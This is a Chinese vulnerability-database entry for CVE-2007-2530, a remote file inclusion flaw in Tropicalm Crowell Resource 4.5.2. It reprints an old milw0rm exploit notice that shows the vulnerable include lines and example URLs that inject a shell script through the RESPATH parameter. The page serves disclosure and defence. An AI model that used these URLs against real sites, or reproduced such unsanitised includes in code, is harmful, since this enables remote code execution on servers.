Tropicalm Crowell Resource RESPATH参数远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112882 漏洞类型 未知
发布时间 2007-05-07 更新时间 2007-05-08
CVE编号 CVE-2007-2530 CNNVD-ID CNNVD-200705-125
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3865
https://www.securityfocus.com/bid/86189
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-125
|漏洞详情
TropicalmCrowellResource中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)dosearch.php或(2)printfriendly.php的RESPATH参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
##############################################################################################
##############################################################################################
#§§§§§__________________________________________§§§§§
§§§§§§§§_____________________________________§§§§§§§
§§§§§§§§§§§_________________________________§§§§§§§§
§§§§§§§§§§§§§§_____________________________§§§§§§§§§
§§§§§§§§§§§§§§§§__________________________§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§______________________§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§___________________§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§_________________§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§_______________§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§§§_____________§§§§§§§§§§§§§
___§§§§§§§§§§§§§§§§§§§§§§§§§__________§§§§§§§§§§§§§§
_____§§§§§§§§§§§§§§§§§§§§§§§§§________§§§§§§§§§§§§§§
________§§§§§§§§§§§§§§§§§§§§§§§_______§§§§§§§§§§§§§§
___________§§§§§§§§§§§§§§§§§§§§§§_____§§§§§§§§§§§§§§
________________§§§§§§§§§§§§§§§§§§§___§§§§§§§§§§§§§§
_____________________§§§§§§§§§§§§§§§__§§§§§§§§§§§§§§
___________________________§§§§§§§§§§§§§§§§§§§§§§§§_
_____________________§§§§§§§§§§§§§§§§§§§§§§§§§§§____
______________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§_______
___________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§______
________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§____
______§§§§§§§§_____§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§___
____§§§§§§§§§_______§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§__
__§§§§§§§§§§§_______§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§_
_§§§§§§§§§§§§§_____§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
_§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§_
__§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§_
_____§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§__
_________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§___
_______________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§___
_________________§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§____
_________________§§§§§§§§§§§§§§§§§§§§§§§§§§§________
________________§§§§§§§§§§_____§§§§§§§§§§___________
_________________§§§§§_________§§§§§_________§§§§§__
__________§§§§_________§§§§____________§§§§§§§§§____
__________§§§§§§§§§§§§§§§§§_____§§§§§§§§§§__________
__________§§§§§§§§§§§§§§§§§___§§§§§_________________
__________§§§§§______§§§§§§_________________________
#
#Tropicalm Crowell Resource v4.5.2 <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR1:dosearch.php
#
#include("$RESPATH/inc/disptmpl1.inc");
#
#BUG1:
#
#Example1:http://site.com/path/dosearch.php?RESPATH=[[Sh3LL Script]]
#
#
#
#ERROR2:printfriendly.php
#
#require_once("$RESPATH/lib/cls/shadow.cls");
#...
#....
#include("$RESPATH/inc/header.inc");
#include("$RESPATH/inc/tabcss.inc"); ?>
#BUG2:
#
#Example2:http://site.com/path/printfriendly.php?RESPATH=[[Sh3LL Script]]
#Script Download
#############################################################################
#
#http://www.tropicalm.net/lib/plug-in/download.php?filename=resdemo.tgz
#
##############################################################################################
#
#kezzap66345@hotmail.com
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
##Str0ke#############################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-07]
|受影响的产品
Tropicalm Tropicalm Crowell Resource 4.5.2
|参考资料

来源:XF
名称:tropicalm-respath-file-include(34113)
链接:http://xforce.iss.net/xforce/xfdb/34113
来源:MILW0RM
名称:3865
链接:http://www.milw0rm.com/exploits/3865
来源:VUPEN
名称:ADV-2007-1680
链接:http://www.frsirt.com/english/advisories/2007/1680
来源:SECUNIA
名称:25179
链接:http://secunia.com/advisories/25179
来源:OSVDB
名称:35824
链接:http://osvdb.org/35824
来源:OSVDB
名称:35823
链接:http://osvdb.org/35823